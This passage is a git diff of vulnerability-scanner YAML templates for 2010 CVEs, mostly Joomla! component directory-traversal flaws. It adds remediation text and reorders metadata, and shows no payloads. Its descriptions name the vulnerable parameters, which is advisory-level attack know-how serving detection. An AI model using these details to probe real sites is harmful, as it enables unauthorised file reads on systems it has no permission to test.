a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + remediation: | + Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586 - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00846 - cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.80024 + cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 69eca79e6a..0b308e76cf 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12236 - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* epss-percentile: 0.84165 + cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamart diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index a0e9f38a38..50063fbc7c 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12283 - https://nvd.nist.gov/vuln/detail/CVE-2010-1602 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* epss-percentile: 0.90259 + cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zimbllc diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index e38324c988..871cb70ce9 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12284 - https://nvd.nist.gov/vuln/detail/CVE-2010-1603 - http://www.vupen.com/english/advisories/2010/0931 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* epss-percentile: 0.90259 + cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zimbllc diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index de5ddacd08..21cadfdabc 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12316 - https://nvd.nist.gov/vuln/detail/CVE-2010-1607 @@ -15,8 +17,8 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.8629 + cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paysyspro diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 50eeb93344..4fa5b296a7 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12430 - https://nvd.nist.gov/vuln/detail/CVE-2010-1653 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* epss-percentile: 0.90353 + cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: htmlcoderhelper diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index f2c8f58e97..02a1a91fc0 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.86395 + cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: recly diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 212fb17e91..df934b435a 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12427 - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* epss-percentile: 0.86395 + cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: code-garage diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 358072a619..aca6b5dab9 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component. reference: - https://www.exploit-db.com/exploits/12426 - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 @@ -17,8 +19,8 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* epss-percentile: 0.86644 + cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webkul diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 2d39aef4f3..d93a17d73a 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component. reference: - https://www.exploit-db.com/exploits/12168 - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 @@ -17,8 +19,8 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* epss-percentile: 0.86395 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 55e50e91be..92114b8e73 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates. reference: - https://www.exploit-db.com/exploits/12174 - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: pucit.edu diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index a60fa9da2e..9a0a597930 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12291 - https://nvd.nist.gov/vuln/detail/CVE-2010-1717 @@ -15,13 +17,13 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* epss-percentile: 0.86313 + cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: if_surfalert_project product: if_surfalert + framework: joomla\! tags: cve2010,joomla,lfi,edb,cve http: diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 72f57440af..f1502fae12 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Archery Scores or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/12282 - https://nvd.nist.gov/vuln/detail/CVE-2010-1718 @@ -14,8 +16,8 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lispeltuut diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index b8b2eed9cb..a05173fd97 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor. reference: - https://www.exploit-db.com/exploits/12233 - https://nvd.nist.gov/vuln/detail/CVE-2010-1719 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: moto-treks diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index e44750678d..2518f37eb0 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component. reference: - https://www.exploit-db.com/exploits/12177 - https://nvd.nist.gov/vuln/detail/CVE-2010-1722 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 7836a7fa59..42826ae2cf 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12289 - https://nvd.nist.gov/vuln/detail/CVE-2010-1723 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* epss-percentile: 0.87217 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 7851861622..1781de6033 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11853 - https://nvd.nist.gov/vuln/detail/CVE-2010-1858 - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* epss-percentile: 0.8306 + cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gelembjuk diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index a36ecbf3f5..ea84d01d63 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -5,6 +5,8 @@ info: author: b0yd severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + remediation: | + Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt @@ -17,8 +19,8 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.04227 - cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.91141 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 3808bf9a68..e04c715081 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/11851 - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* epss-percentile: 0.83609 + cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: com-property diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 5deb57ea92..c974844413 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/12317 - https://nvd.nist.gov/vuln/detail/CVE-2010-1878 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: blueflyingfish.no-ip diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index f9d06dcfb5..393f882215 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12239 - https://nvd.nist.gov/vuln/detail/CVE-2010-1952 - http://www.exploit-db.com/exploits/12239 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cmstactics diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 7d5993de55..7b26216328 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12288 - https://nvd.nist.gov/vuln/detail/CVE-2010-1953 - http://www.vupen.com/english/advisories/2010/0927 - http://www.exploit-db.com/exploits/12288 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* epss-percentile: 0.92341 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 26488bc163..87ef842eb2 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12287 - https://nvd.nist.gov/vuln/detail/CVE-2010-1954 - http://www.exploit-db.com/exploits/12287 - http://www.vupen.com/english/advisories/2010/0928 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* epss-percentile: 0.92341 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 6195fdb597..528bc4d454 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3465aa8905..3456eec27c 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12285 - https://nvd.nist.gov/vuln/detail/CVE-2010-1956 - http://www.exploit-db.com/exploits/12285 - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html - http://www.vupen.com/english/advisories/2010/0930 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.92545 + cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 87ed17ab11..bc44b3274a 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12235 - https://nvd.nist.gov/vuln/detail/CVE-2010-1957 - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 6ced19f464..251d86e10d 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gohigheris diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 